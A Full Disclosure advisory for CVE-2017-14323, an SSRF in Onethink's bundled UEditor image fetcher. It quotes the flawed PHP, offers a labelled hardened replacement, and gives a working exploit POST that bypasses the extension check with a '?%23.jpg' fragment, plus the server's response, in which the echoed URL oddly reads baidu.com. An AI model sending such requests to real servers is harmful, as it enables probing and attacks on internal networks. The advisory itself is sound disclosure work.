Message-ID: <201804042106133614208@baimaohui.net>+3FCD53AD51BD698A
Date: Wed, 4 Apr 2018 21:06:13 +0800
From: "service@...maohui.net" <service@...maohui.net>
To: fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)
# SSRF(Server Side Request Forgery) in Onethink All version (CVE-2017-14323)
Onethink is an open source CMS (Content Management System) built on the ThinkPHP 3.2 development framework.
## Product Download: http://www.onethink.cn
## Vulnerability Type: SSRF (Server Side Request Forgery)
## Attack Type: Remote
## Vulnerability Description
Onethink bundles a flawed version of the UEditor editor; its remote-image fetcher is what introduces the SSRF vulnerability.
The vulnerable code (/Public/static/ueditor/php/getRemoteImage.php):
```php
$uri = htmlspecialchars( $_POST[ 'upfile' ] );
$uri = str_replace( "&amp;" , "&" , $uri );
getRemoteImage( $uri,$config );
//echo($uri);
/**
 * Remote fetch
 * @param $uri
 * @param $config
 */
function getRemoteImage( $uri,$config)
{
    // ignore the execution time limit while fetching
    set_time_limit( 0 );
    // ue_separate_ue is the separator UEditor uses to pass several URLs at once
    $imgUrls = explode( "ue_separate_ue" , $uri );
    $tmpNames = array();
    foreach ( $imgUrls as $imgUrl ) {
        // the only scheme check: the string must start with "http"
        if(strpos($imgUrl,"http")!==0){
            array_push( $tmpNames , "error" );
            continue;
        }
        //echo($imgUrl);
        // fetch the response headers
        $heads = get_headers( $imgUrl ); //This is a blind ssrf
        // dead-link check
        if ( !( stristr( $heads[ 0 ] , "200" ) && stristr( $heads[ 0 ] , "OK" ) ) ) {
            array_push( $tmpNames , "error" );
            continue;
        }
        // format check (extension and Content-Type)
        $fileType = strtolower( strrchr( $imgUrl , '.' ) );
        if ( !in_array( $fileType , $config[ 'allowFiles' ] ) || stristr( $heads[ 'Content-Type' ] , "image" ) ) {
            array_push( $tmpNames , "error" );
            continue;
        }
        //var_dump($tmpNames);
        // open an output buffer and fetch the remote image
        ob_start();
        $context = stream_context_create(
            array (
                'http' => array (
                    'follow_location' => false // don't follow redirects
                )
            )
        );
        // make sure the fopen wrappers are enabled in php.ini
        readfile( $imgUrl,false,$context); //vulnerability is here,request any http(s) url
        $img = ob_get_contents();
        ob_end_clean();
        // ... remainder of the function omitted in the advisory
    }
}
```
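The two weaknesses in the excerpt are that the scheme and extension are checked as substrings of the raw string (so `https://host/?#.jpg` passes because the `.jpg` sits in the fragment, which the HTTP client never sends), and that nothing restricts where the resolved host may point. The following is an added example, not code from Onethink or UEditor, of how a hardened replacement for those checks can look; the function names `isPublicIp`, `resolveHost`, `validateRemoteImageUrl` and `fetchPinned` are assumptions, and `$allowFiles` is assumed to hold dotted extensions such as `.jpg`, matching the original `$config['allowFiles']` usage.

```php
<?php
// Added example, not code from Onethink or UEditor. The function names
// (isPublicIp, resolveHost, validateRemoteImageUrl, fetchPinned) are assumptions.
// It replaces the string checks in getRemoteImage() with URL parsing, host
// resolution and an address policy, then fetches with the checked IP pinned.

declare(strict_types=1);

// Public-address check: FILTER_FLAG_NO_PRIV_RANGE rejects RFC 1918 and fc00::/7,
// FILTER_FLAG_NO_RES_RANGE rejects loopback, link-local, 0.0.0.0/8, ::, ::1, etc.
function isPublicIp(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

// Resolve a hostname to every A and AAAA address; an IP literal is returned as-is.
function resolveHost(string $host): array
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return [$host];
    }
    $v4 = gethostbynamel($host) ?: [];
    $v6 = array_column(@dns_get_record($host, DNS_AAAA) ?: [], 'ipv6');
    return array_values(array_unique(array_merge($v4, $v6)));
}

// Returns the IP to connect to, or null when the URL must be rejected.
function validateRemoteImageUrl(string $url, array $allowFiles): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null; // no credentials embedded in the URL
    }
    // Extension check on the parsed path only, so a ".jpg" placed in the query
    // string or fragment (as in "https://host/?#.jpg") no longer satisfies it.
    $ext = strtolower((string) strrchr($parts['path'] ?? '', '.'));
    if ($ext === '' || !in_array($ext, $allowFiles, true)) {
        return null;
    }
    $ips = resolveHost(trim($parts['host'], '[]'));
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        if (!isPublicIp($ip)) {
            return null; // any non-public answer rejects the whole host
        }
    }
    return $ips[0];
}

// Fetch with the validated IP pinned, so a second DNS lookup by the HTTP client
// cannot return a different (internal) address; redirects stay disabled.
function fetchPinned(string $url, string $ip): ?string
{
    $parts = parse_url($url);
    $port = $parts['port'] ?? ($parts['scheme'] === 'https' ? 443 : 80);
    $addr = strpos($ip, ':') !== false ? "[$ip]" : $ip; // curl wants IPv6 in brackets
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$parts['host']}:{$port}:{$addr}"],
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_MAXFILESIZE    => 5 * 1024 * 1024,
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $type = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);
    // Require a 200 and an image/* Content-Type before accepting the body.
    if ($body === false || $code !== 200 || stripos($type, 'image/') !== 0) {
        return null;
    }
    return $body;
}

// Usage inside the per-URL loop of getRemoteImage():
//   $ip  = validateRemoteImageUrl($imgUrl, $config['allowFiles']);
//   $img = $ip === null ? null : fetchPinned($imgUrl, $ip);
//   if ($img === null) { array_push($tmpNames, "error"); continue; }
```

Two design points: the IP is pinned with `CURLOPT_RESOLVE` because `readfile()` and `get_headers()` each perform their own lookup, so validating the hostname once is not enough against a record that changes between lookups; and the Content-Type is checked on the real response, whereas in the excerpt `get_headers()` is called without its second argument and returns a numerically indexed array, so `$heads['Content-Type']` is always unset and that check never rejects anything.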
## Exploit
Request Content:
```http
POST http://target/Public/static/ueditor/php/getRemoteImage.php HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Connection: keep-alive

upfile=https://www.google.com/?%23.jpg
```
Response Content:
```http
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Content-Length: 110

{'url':'upload/43361505134158.jpg','tip':'远程图片抓取成功!','srcUrl':'http://www.baidu.com/?#.jpg'}
```
Modify the upfile parameter above, for example:
request over http: upfile=http://www.google.com
request over https: upfile=https://www.google.com
This vulnerability only works with the http and https protocols.
Triggering it requires the allow_url_fopen option to be enabled in php.ini; allow_url_fopen is enabled by default.
## Versions
Onethink, all versions
## Impact
SSRF (Server Side Request Forgery) in Onethink V1.0 and V1.1 allows remote attackers to perform information detection and to attack servers on the internal network.
## Credit
This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang & National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14323
service@...maohui.net
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/